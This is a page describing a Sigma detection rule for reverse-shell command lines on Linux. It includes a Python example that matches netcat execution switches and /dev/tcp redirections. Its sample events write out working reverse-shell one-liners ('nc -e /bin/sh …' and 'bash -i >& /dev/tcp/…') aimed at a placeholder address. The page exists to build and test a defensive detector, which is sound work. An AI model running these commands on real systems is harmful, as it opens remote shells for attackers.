
Suspicious Reverse Shell Command Line

Sigma Rules

Summary
This rule detects suspicious reverse shell command lines that threat actors may use to establish a reverse shell connection to a remote server. It leverages known patterns and command syntax associated with reverse shells, including commands that redirect input and output through TCP or UDP sockets. Identifying these commands in a Linux environment supports early detection of unauthorized remote access attempts. Detection relies on monitoring process command lines for keywords indicative of reverse shell behavior, such as the use of netcat (nc), bash redirections to network sockets, or other command constructs that suggest an outgoing connection established to exfiltrate data or give an attacker remote control. Organizations can implement this rule to strengthen their security posture against this prevalent attack technique. Continuous review of the matched commands and patterns allows the detection to be refined gradually, minimizing false positives while ensuring critical incidents are reported promptly.
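The command-line matching the summary describes, as an added example that is not the Sigma rule's own detection block: two illustrative regexes (one for the netcat family invoked with an execution switch, one for redirections into bash's /dev/tcp or /dev/udp pseudo-devices) applied to constructed process-creation events, with benign look-alikes to show where false positives are avoided. The event format, PIDs and the 198.51.100.7 address are assumptions made for the example.

```python
import re
from typing import Iterable, Optional

# Illustrative patterns for the constructs the rule summary names. They are an
# added example and not the Sigma rule's own detection block.
REVERSE_SHELL_PATTERNS = {
    # netcat family invoked with a program-execution switch (-e, -c, --exec)
    "netcat_exec": re.compile(r"\b(?:nc|ncat|netcat)\b.*\s--?[a-z]*[ec]\b"),
    # shell redirection into bash's /dev/tcp or /dev/udp pseudo-device
    "dev_tcp_udp_redirect": re.compile(r"[<>&]\s*/dev/(?:tcp|udp)/[\w.\-]+/\d+"),
}


def match_reverse_shell(cmdline: str) -> Optional[str]:
    """Return the name of the first pattern the command line matches, else None."""
    for name, pattern in REVERSE_SHELL_PATTERNS.items():
        if pattern.search(cmdline):
            return name
    return None


def scan_process_events(events: Iterable[dict]) -> list:
    """Apply the rule to process-creation events (dicts with 'pid' and 'cmdline')."""
    alerts = []
    for event in events:
        hit = match_reverse_shell(event["cmdline"])
        if hit is not None:
            alerts.append({
                "rule": "Suspicious Reverse Shell Command Line",
                "pattern": hit,
                "pid": event["pid"],
                "cmdline": event["cmdline"],
            })
    return alerts


# Constructed sample events; PIDs and the 198.51.100.7 address are placeholders.
SAMPLE_EVENTS = [
    {"pid": 1001, "cmdline": "nc -l -p 8080"},                   # plain listener: not flagged
    {"pid": 1002, "cmdline": "nc -e /bin/sh 198.51.100.7 4444"},
    {"pid": 1003, "cmdline": "bash -i >& /dev/tcp/198.51.100.7/4444 0>&1"},
    {"pid": 1004, "cmdline": "cat /dev/tcp.log"},                # benign path: not flagged
    {"pid": 1005, "cmdline": "sh -c 'echo hello'"},              # no socket redirection
]

if __name__ == "__main__":
    for alert in scan_process_events(SAMPLE_EVENTS):
        print(f"pid={alert['pid']} pattern={alert['pattern']} cmdline={alert['cmdline']!r}")
```

Running it flags PIDs 1002 and 1003 only; the listener, the benign file path and the plain `sh -c` invocation pass through, which is the kind of check worth repeating whenever the patterns are tuned.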
Categories
  • Linux
Data Sources
  • Command
  • Process
Created: 2019-04-02